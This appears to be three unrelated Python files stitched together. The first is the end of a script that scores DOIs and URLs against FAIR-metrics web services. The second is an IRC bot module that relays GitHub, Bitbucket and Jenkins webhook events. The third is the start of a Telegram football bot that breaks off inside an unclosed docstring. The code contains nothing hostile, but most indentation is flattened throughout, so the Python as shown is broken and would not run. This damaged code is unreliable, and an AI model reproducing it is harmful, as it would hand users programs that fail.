help="Number of threads to use. Max available: " + str(multiprocessing.cpu_count()),
type=int,
choices=range(1, multiprocessing.cpu_count() + 1),
default=1,
)
def animated_loading(message):
"""
Add an animated character to show loading at the end of a message.
@param message String The message to be displayed
"""
# string of char the will be displayed in a loop
chars = "/—\|"
# the loop over the chars
for char in chars:
sys.stdout.write("\r" + message + char)
time.sleep(0.1)
sys.stdout.flush()
def processFunction(function, args, message):
"""
    Execute another function through a wrapper, displaying an animated message while it runs.
@param function Method A python function to be executed
@param args List The arguments of the function to be executed
@param message String The message to be displayed
"""
# List that will contains the results of the input function
res = []
# Initialize and start the process
the_process = threading.Thread(target=wrapper, args=(function, args, res))
the_process.start()
# Execute the animated message as long as the process is alive (executing the input function)
if PRINT_DETAILS:
        while the_process.is_alive():
animated_loading(message)
the_process.join()
# print('test')
sys.stdout.write("\r\033[K")
sys.stdout.flush()
return res[0]
def wrapper(func, args, res):
"""
The wrapper that execute the input function.
@param func Method The python function to be executed
@param args List The arguments of the function to be executed
@param res List The list of results from the input function
"""
res.append(func(*args))
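# Hedged illustration (not part of the original script): processFunction runs an
# arbitrary callable in a worker thread, animates the message while it runs, and
# returns the callable's result. The helper name below is an assumption.
def _example_processFunction():
    # sum([1, 2, 3]) is executed by the worker; its result is returned once done
    return processFunction(sum, [[1, 2, 3]], "Summing... ")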
def testMetric(metric_api_url, data):
"""
    Send a request to the metric's API URL to run the test.
    @param metric_api_url String The URL of one metric to test the data against
    @param data dict Contains the GUID to be tested
    @return String JSON-LD formatted result returned by the request
"""
    ##### WORKAROUND: UPDATE ONCE FAIRMETRICS IS UP TO DATE
# base_url = "http://linkeddata.systems/cgi-bin/FAIR_Tests/"
# sub_url = metric_api_url.split('/')[5]
# metric_api_url = base_url + sub_url
# print(metric_api_url)
while True:
try:
response = requests.request(
method="POST", url=metric_api_url, data=data, timeout=TIMEOUT
)
result = response.text
break
except requests.exceptions.Timeout:
print("Timeout, retrying...")
time.sleep(5)
except requests.exceptions.ReadTimeout:
print("ReadTimeout, retrying...")
time.sleep(20)
except SSLError:
print("SSLError, retrying...")
time.sleep(10)
return result
def testMetrics(GUID):
"""
    Call "testMetric" multiple times to test each metric against one GUID.
@param GUID String The GUID to be tested
@return tuple (headers_list, descriptions_list, test_score_list, time_list, comments_list)
"""
if args.directory:
OUTPUT_DIR = args.directory
if args.output:
OUTPUT_PREF = args.output
# Create the data dict containing the GUID
data = '{"subject": "' + GUID + '"}'
data = data.encode("utf-8")
# Retrieve all the metrics general info and api urls
metrics = getMetrics()
metric_test_results = [
{
"@id": "metric",
"score": GUID,
"principle": "GUID",
"test_time": GUID,
"comment": '"' + GUID + '"',
"description": "Description",
}
]
if args.thread_num > 1:
metrics_list = []
for metric in metrics:
metric_test_results.append(
{
"@id": metric["@id"],
"principle": metric["principle"].rsplit("/", 1)[-1],
}
)
metrics_list.append((metric, data))
# initialize parallelized
num_cores = multiprocessing.cpu_count()
p = Pool(num_cores)
list_results = []
# starting metrics test
for result in tqdm(
p.imap_unordered(pTestMetric, metrics_list),
total=len(metrics_list),
dynamic_ncols=True,
):
list_results.append(result)
p.close()
p.join()
# append res to lists
for result in list_results:
for i, test in enumerate(metric_test_results):
if result:
if result["@id"] == test["@id"]:
metric_test_results[i]["score"] = result["score"]
metric_test_results[i]["test_time"] = result["test_time"]
metric_test_results[i]["comment"] = result["comment"]
metric_test_results[i]["description"] = result["description"]
else:
n = 0
# iterate over each metric
for metric in metrics:
n += 1
# retrieve more specific info about each metric
metric_info = processFunction(
                getMetricInfo, [metric["@id"]], "Retrieving metric information... "
)
# retrieve the name (principle) of each metric (F1, A1, I2, etc)
principle = metric_info["principle"].rsplit("/", 1)[-1]
# principle = metric_info["principle"]
# get the description on the metric
description = '"' + metric_info["description"] + '"'
if True:
# if principle[0:2] != 'I2':
# if principle[0:2] == 'I2':
if PRINT_DETAILS:
# print informations related to the metric
printMetricInfo(metric_info)
# evaluate the metric
start_time = getCurrentTime()
metric_evaluation_result_text = processFunction(
testMetric,
[metric["smarturl"], data],
"Evaluating metric " + principle + "... ",
)
end_time = getCurrentTime()
# print(metric_evaluation_result_text)
metric_evaluation_result = json.loads(metric_evaluation_result_text)
test_time = end_time - start_time
if PRINT_DETAILS:
# print results of the evaluation
printTestMetricResult(metric_evaluation_result_text, test_time)
# get comment
                # SPARQL QUERY !!!!!
comment = requestResultSparql(
metric_evaluation_result_text, "schema:comment"
)
# remove empty lines from the comment
comment = cleanComment(comment)
# filter comment based on args
if args.write_comment:
comment = filterComment(comment, args.write_comment)
comment = '"' + comment + '"'
# get the score
score = requestResultSparql(
metric_evaluation_result_text, "ss:SIO_000300"
)
score = str(int(float(score)))
# add score, principle, time, comment and description
metric_test_results.append(
{
"@id": metric["@id"],
"principle": principle,
"score": score,
"test_time": test_time,
"comment": comment,
"description": description,
}
)
    # list that will contain the score for each metric test
    test_score_list = []
    # list that will contain the name (principle) of each metric test (F1, A1, I2, etc)
    headers_list = []
    # list that will contain the execution time for each metric test
    time_list = []
    # list that will contain the comment for each metric test
    comments_list = []
    # list that will contain the description for each metric test
    descriptions_list = []
for test_result in metric_test_results:
test_score_list.append(test_result["score"])
headers_list.append(test_result["principle"])
time_list.append(test_result["test_time"])
comments_list.append(test_result["comment"])
descriptions_list.append(test_result["description"])
sumScoresTimes(headers_list, test_score_list, time_list)
    # write the list of scores (and the header if the file doesn't exist yet) to a result file
writeScoreFile(
"\t".join(headers_list),
"\t".join(test_score_list),
OUTPUT_DIR,
"/" + OUTPUT_PREF + "_score.tsv",
)
# write a new line to the time file or create it
writeTimeFile(
"\t".join(headers_list),
"\t".join(map(str, time_list)),
OUTPUT_DIR,
"/" + OUTPUT_PREF + "_time.tsv",
)
# write a new line to the comment file or create it
writeCommentFile(
"\t".join(headers_list),
"\t".join(comments_list),
"\t".join(descriptions_list),
OUTPUT_DIR,
"/" + OUTPUT_PREF + "_comment.tsv",
)
    ### TODO: also add the summed scores and times to stdout
# if args.score:
# if args.time:
return (
headers_list,
descriptions_list,
test_score_list,
list(map(str, time_list)),
comments_list,
)
def asyncTestMetric(metric):
global args
args = parser.parse_args()
args.write_comment = False
return pTestMetric(metric)
def pTestMetric(metric):
# retrieve more specific info about each metric
metric_info = getMetricInfo(metric[0]["@id"])
# retrieve the name (principle) of each metric (F1, A1, I2, etc)
principle = metric_info["principle"].rsplit("/", 1)[-1]
# get the description on the metric
description = '"' + metric_info["description"] + '"'
# if principle[0:2] != 'I2':
# if principle[0] == 'F':
if True:
start_time = getCurrentTime()
metric_evaluation_result_text = testMetric(metric[0]["smarturl"], metric[1])
end_time = getCurrentTime()
# print(metric_evaluation_result_text)
metric_evaluation_result = json.loads(metric_evaluation_result_text)
test_time = end_time - start_time
# get comment
        # SPARQL QUERY !!!!!
comment = requestResultSparql(metric_evaluation_result_text, "schema:comment")
# remove empty lines from the comment
comment = cleanComment(comment)
# filter comment based on args
if args.write_comment:
comment = filterComment(comment, args.write_comment)
comment = '"' + comment + '"'
# get the score
score = requestResultSparql(metric_evaluation_result_text, "ss:SIO_000300")
score = str(int(float(score)))
dict_result = {
"@id": metric[0]["@id"],
"score": score,
"principle": principle,
"test_time": test_time,
"comment": comment,
"description": description,
}
return dict_result
return False
def requestResultSparql(metric_evaluation_result_text, term):
g = rdflib.Graph()
result = g.parse(data=metric_evaluation_result_text, format="json-ld")
rdf_string = g.serialize(format="turtle").decode("utf-8")
# print(g.serialize(format="json-ld").decode("utf-8"))
# TODO use RDFLib graph traversal methods to retrieve some parts of the graphs
prefix = """
PREFIX obo:<http://purl.obolibrary.org/obo/>
PREFIX schema:<http://schema.org/>
PREFIX ss:<http://semanticscience.org/resource/>
"""
s = Template(
"""
$prefix
SELECT ?s ?p ?o
WHERE { ?s $term ?o }
"""
)
query_string = s.substitute(prefix=prefix, term=term)
query_res = result.query(query_string)
res_list = []
for (s, p, o) in query_res:
res_list.append(o)
return "\n".join(res_list)
def sumScoresTimes(headers_list, test_score_list, time_list):
""""""
sum_score_dict = {}
sum_dict = {}
for i, principle in enumerate(headers_list):
if i > 0:
lettre = principle[0]
score = test_score_list[i]
time = time_list[i]
# scores
if not lettre in sum_dict.keys():
sum_dict[lettre] = [(score, time)]
else:
sum_dict[lettre].append((score, time))
total_score = 0
total_time = timedelta()
for key, value_list in sum_dict.items():
letter_score = 0
letter_time = timedelta()
# accumulate values for each letter
for value in value_list:
letter_score += int(value[0])
letter_time += value[1]
# accumulate total values
total_score += letter_score
total_time += letter_time
        # adding sum by category (FAIR)
headers_list.append(key)
test_score_list.append(str(letter_score))
time_list.append(letter_time)
# adding total sum
headers_list.append("total")
test_score_list.append(str(total_score))
time_list.append(total_time)
# convert datetime in time_list to str
def writeTimeFile(headers_list, time_list, output_dir, filename):
""""""
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
filename = output_dir + filename
exists = os.path.isfile(filename)
if exists:
file = open(filename, "a")
file.write("\n" + time_list)
file.close()
else:
file = open(filename, "w")
file.write(headers_list)
file.write("\n" + time_list)
file.close()
def writeCommentFile(
headers_list, test_comment_list, descriptions_list, output_dir, filename
):
"""
    @param descriptions_list List Contains the description of each principle, added to the top of the file
"""
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
filename = output_dir + filename
exists = os.path.isfile(filename)
if exists:
file = open(filename, "a")
file.write("\n" + test_comment_list)
file.close()
else:
file = open(filename, "w")
file.write(descriptions_list)
file.write("\n" + headers_list)
file.write("\n" + test_comment_list)
file.close()
def writeScoreFile(headers_list, test_score_list, output_dir, filename):
"""
    Write a line of scores associated with a GUID to a result file; create the file and headers if it doesn't exist yet.
@param test_score_list List Score results for each test (0 or 1)
@param headers_list List Principle of each metric that will be used as headers
@param filename String The name of the output file
"""
logname = "result_metrics_test.log"
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
filename = output_dir + filename
exists = os.path.isfile(filename)
if exists:
file = open(filename, "a")
file.write("\n" + test_score_list)
file.close()
else:
file = open(filename, "w")
file.write(headers_list)
file.write("\n" + test_score_list)
file.close()
def getCurrentTime():
"""
    Function returning the current time, formatted
@return datetime object
"""
return datetime.strptime(time.strftime("%Y-%m-%d %H:%M:%S"), "%Y-%m-%d %H:%M:%S")
def getMetricInfo(metric_url):
"""
Send a request to retrieve additional info about one metric.
    @param metric_url String The URL where the metric information is located
    @return json JSON-LD formatted result returned by the request
"""
while True:
try:
response = requests.request(
method="GET",
url=metric_url + ".json",
allow_redirects=True,
timeout=TIMEOUT,
)
result = response.json()
break
except requests.exceptions.Timeout:
time.sleep(5)
except requests.exceptions.ReadTimeout:
time.sleep(20)
except SSLError:
time.sleep(10)
return result
def printTestMetricResult(result, test_time):
"""
    Send the comments, score and test time of a metric test against a GUID to stdout.
    @param result String The JSON-LD formatted result of the metric test
    @param test_time timedelta Duration of the metric test
"""
if args.comment:
print("Comment:")
# print(result[0][key][0]['@value'], end='\n\n')
comment = requestResultSparql(result, "schema:comment")
comment = cleanComment(comment)
comment_args = args.comment
comment = filterComment(comment, comment_args)
        # TODO: move this loop into colorComment
for line in comment.split("\n"):
# if line.startswith('SUCCESS') or line.startswith('FAILURE'):
l = colorComment(line)
print(l, end="\n")
print("")
if args.score:
print("Score:")
print(requestResultSparql(result, "ss:SIO_000300"), end="\n\n")
if args.time:
print("Metric test time:")
print(test_time, end="\n\n")
def filterComment(comment, comment_args):
"""
Select the type of comment to display based on the command line arguments.
@param comment String The comment from the metric test
@return String The filtered comment
"""
association_dict = {
"s": "SUCCESS",
"f": "FAILURE",
"w": "WARN",
"i": "INFO",
"c": "CRITICAL",
}
filtered_comment = []
additional_info = False
for line in comment.split("\n"):
        # check if line is not additional info (starts with any association_dict value)
for value in association_dict.values():
if line.startswith(value):
additional_info = False
break
for arg in comment_args:
            # if line starts with the param value or is additional info, add it to filtered_comment
if line.startswith(association_dict[arg]) or additional_info:
filtered_comment.append(line)
additional_info = True
break
# if additional_info:
# filtered_comment.append(line)
# break
return "\n".join(filtered_comment)
def cleanComment(comment):
"""
Remove empty lines from the comment.
@param comment String The comment about the metric test
@return String The cleaned comment about the metric test
"""
comment = comment.split("\n")
if "" in comment:
comment = [l for l in comment if l != ""]
comment = "\n".join(comment)
return comment
def colorComment(line):
"""
Color some specific terms in the comments in the stdout.
@param line String The comment line to be colored
"""
# dict containing words as key and the associated color as value
association_dict = {
"SUCCESS": "green",
"FAILURE": "red",
"WARN": "yellow",
"INFO": "cyan",
"CRITICAL": "magenta",
}
l = ""
# add the color to the terms if they exists
for key_term, value_color in association_dict.items():
if line.startswith(key_term):
l = line.replace(key_term, termcolor.colored(key_term, value_color))
return l
return line
def printMetricInfo(metric_info):
if (
args.name
or args.principle
or args.description
or args.comment
or args.score
or args.time
):
print("#" * 70, end="\n\n")
if args.name:
print(metric_info["name"], end="\n\n")
if args.principle:
print("Principle: " + metric_info["principle"].rsplit("/", 1)[-1], end="\n\n")
if args.description:
print("Description:")
print(metric_info["description"], end="\n\n")
def getMetrics():
"""
    Retrieve general information about each metric.
    @return json JSON-LD formatted result returned by the request
"""
metrics_url = (
"https://fair-evaluator.semanticscience.org/FAIR_Evaluator/metrics.json"
)
while True:
try:
response = requests.get(url=metrics_url, timeout=TIMEOUT)
break
except SSLError:
time.sleep(5)
except requests.exceptions.Timeout:
print("Timeout, retrying")
time.sleep(5)
except requests.exceptions.ConnectionError as e:
print(e)
print("ConnectionError, retrying...")
time.sleep(10)
json_res = response.json()
return json_res
def readDOIsFile(filename):
"""
Read the DOIs from a file input.
@param filename String The inputs DOIs to be tested
"""
with open(filename, "r") as file:
data = file.read()
return data
def webTestMetrics(GUID_test):
global args
args = parser.parse_args()
PRINT_DETAILS = True
args.description = True
args.thread_num = multiprocessing.cpu_count()
args.directory = "web_test_dir"
return testMetrics(GUID_test)
if __name__ == "__main__":
args = parser.parse_args()
PRINT_DETAILS = True
# if len(sys.argv) < 2:
# print("You haven't specified any arguments. Use -h to get more details on how to use this command.")
# sys.exit(1)
# RSAT paper
# GUID_test = "10.1093/nar/gky317"
# Dataset +++
GUID_test = "https://doi.pangaea.de/10.1594/PANGAEA.902591"
# Dataset
# GUID_test = "https://doi.org/10.5061/dryad.615"
# GUID_test = "10.5061/dryad.615"
# GUID_test = "https://www.france-bioinformatique.fr/en"
# GUID_test = "https://fairsharing.org/"
# GUID_test = "https://biit.cs.ut.ee/gprofiler/gost"
# GUID_test = "https://bio.tools/rsat_peak-motifs"
if args.input:
GUID_test = args.input
    # !!!! problematic URLs !!!!
# GUID_test = "10.1155/2019/2561828"
# GUID_test = "10.1155/2017/3783714"
# GUID_test = "https://identifiers.org/biotools:the_flux_capacitor"
# GUID_test = "10.1002/cpbi.72"
# GUID_test = "10.1093/neuros/nyw135"
# GUID_test = 'https://orcid.org/0000-0002-3597-8557'
# for i in range(0, 10):
results = testMetrics(GUID_test)
|
git.py
|
#!/usr/bin/env python
"""
git.py - Github Post-Receive Hooks Module
"""
import http.server
from threading import Thread
from io import StringIO
import json
import os
import re
import time
import atexit
import signal
from tools import generate_report, PortReuseTCPServer, truncate
import urllib.parse
import web
from modules import more
import logging
logger = logging.getLogger('phenny')
# githooks port
PORT = 1234
# module-global variables
httpd = None
def close_socket():
global httpd
if httpd:
httpd.shutdown()
httpd.server_close()
httpd = None
MyHandler.phenny = None
atexit.register(close_socket)
def signal_handler(signal, frame):
close_socket()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGQUIT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# githooks handler
class MyHandler(http.server.SimpleHTTPRequestHandler):
phenny = None
def return_data(self, site, data, commit):
'''Generates a report for the specified site and commit.'''
# fields = project name, author, commit message, modified files, added
# files, removed files, revision
fields = []
if site == "github":
fields = [
data['repository']['name'],
data['pusher']['name'],
commit['message'],
commit['modified'],
commit['added'],
commit['removed'],
commit['id'][:7],
]
elif site == "googlecode":
fields = [
data['project_name'],
commit['author'],
commit['message'],
commit['modified'],
commit['added'],
commit['removed'],
commit['revision'],
]
elif site == "bitbucket":
files = self.getBBFiles(commit['files'])
fields = [
'turkiccorpora',
commit['author'],
commit['message'],
files['modified'],
files['added'],
files['removed'],
commit['node'],
]
# the * is for unpacking
return generate_report(*fields)
# return error code because a GET request is meaningless
def do_GET(self):
parsed_params = urllib.parse.urlparse(self.path)
query_parsed = urllib.parse.parse_qs(parsed_params.query)
self.send_response(405)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_POST(self):
'''Handles POST requests for all hooks.'''
try:
# read and decode data
logger.debug('payload received; headers: '+str(self.headers))
length = int(self.headers['Content-Length'])
indata = self.rfile.read(length)
post_data = urllib.parse.parse_qs(indata.decode('utf-8'))
if len(post_data) == 0:
post_data = indata.decode('utf-8')
if "payload" in post_data:
data = json.loads(post_data['payload'][0])
else:
data = json.loads(post_data)
except Exception as error:
logger.error('Error 400 (no valid payload)')
logger.error(str(error))
self.send_response(400)
self.send_header("Content-type", "text/html")
self.end_headers()
for channel in self.phenny.config.channels:
self.phenny.msg(channel, 'Webhook received malformed payload')
return
try:
self.do_POST_unsafe(data)
except Exception as error:
try:
commits = [commit['url'] for commit in data['commits']]
logger.error('Error 501 (commits were ' + ', '.join(commits) + ')')
except:
logger.error('Error 501 (commits unknown or malformed)')
logger.error(str(data))
logger.error(str(error))
self.send_response(501)
self.send_header("Content-type", "text/html")
self.end_headers()
for channel in self.phenny.config.channels:
self.phenny.msg(channel, 'Webhook received problematic payload')
def do_POST_unsafe(self, data):
# will contain both commit reports and error reports
msgs_by_channel = {}
msgs_default_channels = []
repo = ''
event = None
silent_on_purpose = False
# handle GitHub triggers
if 'GitHub' in self.headers['User-Agent']:
event = self.headers['X-Github-Event']
user = data['sender']['login']
if 'repository' in data:
repo = data['repository']['name']
elif 'organization' in data:
repo = data['organization']['login'] + ' (org)'
if event == 'commit_comment':
commit = data['comment']['commit_id'][:7]
url = data['comment']['html_url']
url = url[:url.rfind('/') + 7]
action = data['action']
if action == 'deleted':
template = '{:}: {:} * comment deleted on commit {:}: {:}'
msgs_default_channels.append(template.format(repo, user, commit, url))
else:
template = '{:}: {:} * comment {:} on commit {:}: {:} {:}'
comment = truncate(
data['comment']['body'],
template.format(repo, user, action, commit, '', url)
)
msgs_default_channels.append(template.format(repo, user, action, commit, comment, url))
elif event == 'create' or event == 'delete':
                template = '{:}: {:} * {:} {:} {:}d'
ref = data['ref']
type_ = data['ref_type']
msgs_default_channels.append(template.format(repo, user, type_, ref, event))
elif event == 'fork':
template = '{:}: {:} forked this repo {:}'
url = data['forkee']['html_url']
msgs_default_channels.append(template.format(repo, user, url))
elif event == 'issue_comment':
if 'pull_request' in data['issue']:
url = data['issue']['pull_request']['html_url']
text = 'pull request'
else:
url = data['issue']['html_url']
text = 'issue'
number = data['issue']['number']
action = data['action']
if action == 'deleted':
template = '{:}: {:} * comment deleted on {:} #{:}: {:}'
msgs_default_channels.append(template.format(repo, user, text, number, url))
else:
template = '{:}: {:} * comment {:} on {:} #{:}: {:} {:}'
comment = truncate(
data['comment']['body'],
template.format(repo, user, action, text, number, '', url)
)
msgs_default_channels.append(template.format(repo, user, action, text, number, comment, url))
elif event == 'issues':
template = '{:}: {:} * issue #{:} "{:}" {:} {:} {:}'
number = data['issue']['number']
title = data['issue']['title']
action = data['action']
url = data['issue']['html_url']
opt = ''
if data['issue']['assignee']:
opt += 'assigned to ' + data['issue']['assignee']['login']
elif 'label' in data:
opt += 'with ' + data['label']['name']
msgs_default_channels.append(template.format(repo, user, number, title, action, opt, url))
elif event == 'member':
                template = '{:}: {:} * user {:} {:} as collaborator'
new_user = data['member']['login']
action = data['action']
msgs_default_channels.append(template.format(repo, user, new_user, action))
elif event == 'membership':
                template = '{:}: user {:} {:} {:} {:} {:}'
new_user = data['member']['login']
action = data['action']
prep = ['to', 'from'][int(action == 'removed')]
scope = data['scope']
name = data['team']['name']
msgs_default_channels.append(template.format(repo, new_user, action, prep, scope, name))
elif event == 'pull_request':
template = '{:}: {:} * pull request #{:} "{:}" {:} {:} {:}'
number = data['number']
title = data['pull_request']['title']
action = data['action']
url = data['pull_request']['html_url']
opt = ''
if data['pull_request']['assignee']:
opt = 'to ' + data['pull_request']['assignee']
msgs_default_channels.append(template.format(repo, user, number, title, action, opt, url))
elif event == 'pull_request_review_comment':
template = '{:}: {:} * review comment deleted on pull request #{:}: {:}'
number = data['pull_request']['number']
url = data['comment']['html_url']
action = data['action']
if action == 'deleted':
msgs_default_channels.append(template.format(repo, user, number, url))
else:
template = '{:}: {:} * review comment {:} on pull request #{:}: {:} {:}'
comment = truncate(
data['comment']['body'],
template.format(repo, user, action, number, '', url)
)
msgs_default_channels.append(template.format(repo, user, action, number, comment, url))
elif event == 'push':
template = '{:}: {:} * {:}: {:} {:}'
ref = data['ref'].split('/')[-1]
repo_fullname = data['repository']['full_name']
fork = data['repository']['fork']
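# branch_channels (from the bot config) maps a repository's full name to a dict of
# branch -> list of channels, e.g. (hypothetical values):
#   branch_channels = {"example-org/example-repo": {"develop": ["#example-dev"]}}
# Pushes to branches without an entry are only announced on the default channels
# when they target 'master' on a non-fork repository; otherwise they stay silent.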
try:
branch_channels = self.phenny.config.branch_channels[repo_fullname][ref]
except (AttributeError, KeyError):
branch_channels = []
for commit in data['commits']:
non_trunc = template.format(
data['repository']['name'], data['pusher']['name'],
', '.join(commit['modified'] + commit['added']),
'{:}',
commit['url'][:commit['url'].rfind('/') + 7]
)
message = non_trunc.format(truncate(commit['message'], non_trunc.format('')))
if ref == 'master' and not fork:
msgs_default_channels.append(message)
elif branch_channels:
for channel in branch_channels:
if channel in msgs_by_channel:
msgs_by_channel[channel].append(message)
else:
msgs_by_channel[channel] = [message]
else:
silent_on_purpose = True
elif event == 'release':
template = '{:}: {:} * release {:} {:} {:}'
tag = data['release']['tag_name']
action = data['action']
url = data['release']['html_url']
msgs_default_channels.append(template.format(repo, user, tag, action, url))
elif event == 'repository':
template = 'new repository {:} {:} by {:} {:}'
name = data['repository']['name']
action = data['action']
url = data['repository']['url']
msgs_default_channels.append(template.format(name, action, user, url))
elif event == 'team_add':
template = 'repository {:} added to team {:}'
name = data['repository']['full_name']
team = data['team']['name']
msgs_default_channels.append(template.format(name, team))
elif event == 'ping':
template = 'ping from {:}, org: {:}'
if 'organization' in data:
org = data['organization']['login']
else:
org = "no org specified!"
sender = data['sender']['login']
msgs_default_channels.append(template.format(sender, org))
else:
msgs_default_channels.append('sorry, event {:} not supported yet.'.format(event))
msgs_default_channels.append(str(data.keys()))
elif 'Jenkins' in self.headers['User-Agent']:
msgs_default_channels.append('Jenkins: {}'.format(data['message']))
# not github or Jenkins
elif "commits" in data:
for commit in data['commits']:
try:
if "author" in commit:
# for bitbucket
message = self.return_data("bitbucket", data, commit)
msgs_default_channels.append(message)
else:
# we don't know which site
message = "unsupported data: " + str(commit)
msgs_default_channels.append(message)
except Exception:
logger.warning("unsupported data: " + str(commit))
if (not msgs_by_channel) and (not msgs_default_channels) and (not silent_on_purpose):
# we couldn't get anything
if event:
msgs_default_channels.append("Don't know about '" + event + "' events")
else:
msgs_default_channels.append("Unable to deal with unknown event")
# post all messages to all channels
# except where specified in the config
try:
default_channels = self.phenny.config.git_channels[repo]
except Exception:
default_channels = self.phenny.config.channels
for message in msgs_default_channels:
for channel in default_channels:
if channel in msgs_by_channel:
msgs_by_channel[channel].append(message)
else:
msgs_by_channel[channel] = [message]
for channel in msgs_by_channel.keys():
more.add_messages(self.phenny, channel, msgs_by_channel[channel])
# send OK code
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def getBBFiles(self, filelist):
'''Sort filelist into added, modified, and removed files
(only for bitbucket).'''
toReturn = {"added": [], "modified": [], "removed": []}
for onefile in filelist:
toReturn[onefile['type']].append(onefile['file'])
return toReturn
def setup_server(phenny):
'''Set up and start hooks server.'''
global httpd
if not httpd:
MyHandler.phenny = phenny
httpd = PortReuseTCPServer(("", PORT), MyHandler)
Thread(target=httpd.serve_forever).start()
phenny.say("Server is up and running on port %s" % PORT)
def auto_start(phenny, input):
if input.nick != phenny.nick:
return
if phenny.config.githook_autostart:
setup_server(phenny)
auto_start.rule = '(.*)'
auto_start.event = 'JOIN'
def teardown(phenny):
close_socket()
phenny.say("Server has stopped on port %s" % PORT)
def gitserver(phenny, input):
'''Control git server. Possible commands are:
.gitserver status (all users)
.gitserver start (admins only)
.gitserver stop (admins only)'''
global httpd
command = input.group(1).strip()
if input.admin:
# we're admin
# everywhere below, 'httpd' being None indicates that the server is not
# running at the moment
if command == "stop":
if httpd is not None:
teardown(phenny)
else:
phenny.reply("Server is already down!")
elif command == "start":
if httpd is None:
setup_server(phenny)
else:
phenny.reply("Server is already up!")
elif command == "status":
if httpd is None:
phenny.reply("Server is down! Start using '.gitserver start'")
else:
phenny.reply("Server is up! Stop using '.gitserver stop'")
else:
phenny.reply("Usage '.gitserver [status | start | stop]'")
else:
if command == "status":
if httpd is None:
phenny.reply("Server is down! (Only admins can start it up)")
else:
phenny.reply(("Server is up and running! "
"(Only admins can shut it down)"))
else:
phenny.reply("Usage '.gitserver [status]'")
# command metadata and invocation
gitserver.name = "gitserver"
gitserver.rule = ('.gitserver', '(.*)')
def get_commit_info(phenny, repo, sha):
'''Get commit information for a given repository and commit identifier.'''
repoUrl = phenny.config.git_repositories[repo]
if repoUrl.find("code.google.com") >= 0:
locationurl = '/source/detail?r=%s'
elif repoUrl.find("api.github.com") >= 0:
locationurl = '/commits/%s'
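# e.g. a repoUrl of "https://api.github.com/repos/<owner>/<repo>" (placeholder
# owner/repo) combined with '/commits/%s' yields GitHub's "get a commit" endpoint,
# whose JSON response is parsed below.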
elif repoUrl.find("bitbucket.org") >= 0:
locationurl = ''
html = web.get(repoUrl + locationurl % sha)
# get data
data = json.loads(html)
author = data['commit']['committer']['name']
comment = data['commit']['message']
# create summary of commit
modified_paths = []
added_paths = []
removed_paths = []
for file in data['files']:
if file['status'] == 'modified':
modified_paths.append(file['filename'])
elif file['status'] == 'added':
added_paths.append(file['filename'])
elif file['status'] == 'removed':
removed_paths.append(file['filename'])
# revision number is first seven characters of commit identifier
rev = sha[:7]
# format date
date = time.strptime(data['commit']['committer']['date'],
"%Y-%m-%dT%H:%M:%SZ")
date = time.strftime("%d %b %Y %H:%M:%S", date)
url = data['html_url']
return (author, comment, modified_paths, added_paths, removed_paths,
rev, date), url
def get_recent_commit(phenny, input):
'''Get recent commit information for each repository Begiak monitors. This
command is called as 'begiak: recent'.'''
for repo in phenny.config.git_repositories:
html = web.get(phenny.config.git_repositories[repo] + '/commits')
data = json.loads(html)
# the * is for unpacking
info, url = get_commit_info(phenny, repo, data[0]['sha'])
msg = generate_report(repo, *info)
# the URL is truncated so that it has at least 6 sha characters
url = url[:url.rfind('/') + 7]
phenny.say('{:s} {:s}'.format(truncate(msg, ' ' + url), url))
# command metadata and invocation
get_recent_commit.rule = ('$nick', 'recent')
get_recent_commit.priority = 'medium'
get_recent_commit.thread = True
def retrieve_commit(phenny, input):
'''Retrieve commit information for a given repository and revision. This
command is called as 'begiak: info <repo> <rev>'.'''
# get repo and rev with regex
data = input.group(1).split(' ')
if len(data) != 2:
phenny.reply("Invalid number of parameters.")
return
repo = data[0]
rev = data[1]
if repo in phenny.config.svn_repositories:
# we don't handle SVN; see modules/svnpoller.py for that
return
if repo not in phenny.config.git_repositories:
phenny.reply("That repository is not monitored by me!")
return
try:
info, url = get_commit_info(phenny, repo, rev)
except Exception:
phenny.reply("Invalid revision value!")
return
# the * is for unpacking
msg = generate_report(repo, *info)
# the URL is truncated so that it has at least 6 sha characters
url = url[:url.rfind('/') + 7]
phenny.say('{:s} {:s}'.format(truncate(msg, ' ' + url), url))
# command metadata and invocation
retrieve_commit.rule = ('$nick', 'info(?: +(.*))')
|
bot.py
|
"""
## Program structure
bot.py handles all the messages users send to the bot, then uses `AnswerGenerator`
to build the reply to the user's command. This file contains the message handlers.
## Executing the bot
To run the bot, provide its `API_TOKEN` as an environment variable (the bot also
reads `DATABASE_URL`, `BOT_INTERVAL` and `BOT_TIMEOUT` the same way).
In Linux:
```
export API_TOKEN=xxx
```
Then just run bot.py:
```
python3 ./bot.py
```
---
"""
import telebot
import psycopg2
import threading
from random import choice, shuffle
from decouple import config
from time import sleep
from football import gen_player
from leagues.league_table import ChampionshipTable
from leagues.league_scores import ChampionshipScores
from leagues.league_latest import ChampionshipLatest
try:
db = psycopg2.connect(config('DATABASE_URL'))
cursor = db.cursor()
# Print PostgreSQL Connection properties
print(db.get_dsn_parameters(), "\n")
# Print PostgreSQL version
cursor.execute("SELECT version();")
record = cursor.fetchone()
print("You are connected to - ", record, '\n')
# Create Users Table
cursor.execute('CREATE TABLE IF NOT EXISTS users (id SERIAL, userId VARCHAR NOT NULL);')
db.commit()
print("Table created successfully in PostgreSQL!")
except Exception as error:
print("Error occurred", error)
# New Bot Instance
bot = telebot.TeleBot(config('API_TOKEN'))
print("Bot is running")
BOT_INTERVAL = int(config('BOT_INTERVAL'))
BOT_TIMEOUT = int(config('BOT_TIMEOUT'))
def bot_polling():
while True:
try:
print("Starting bot polling now. New bot instance started!")
bot.polling(none_stop=True, interval=BOT_INTERVAL, timeout=BOT_TIMEOUT)
except Exception as ex:
print("Bot polling failed, restarting in {}sec. Error:\n{}".format(BOT_TIMEOUT, ex))
bot.stop_polling()
sleep(BOT_TIMEOUT)
else:
bot.stop_polling()
print("Bot polling loop finished.")
break
# Welcome Menu
@bot.message_handler(commands=['start'])
def send_welcome(m):
"""[note]:
Handles the **/start** command.
try:
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Check Statistics', 'ℹ️ Help')
user_markup.row('⚽ Start the Game')
from_user = [m.from_user.id]
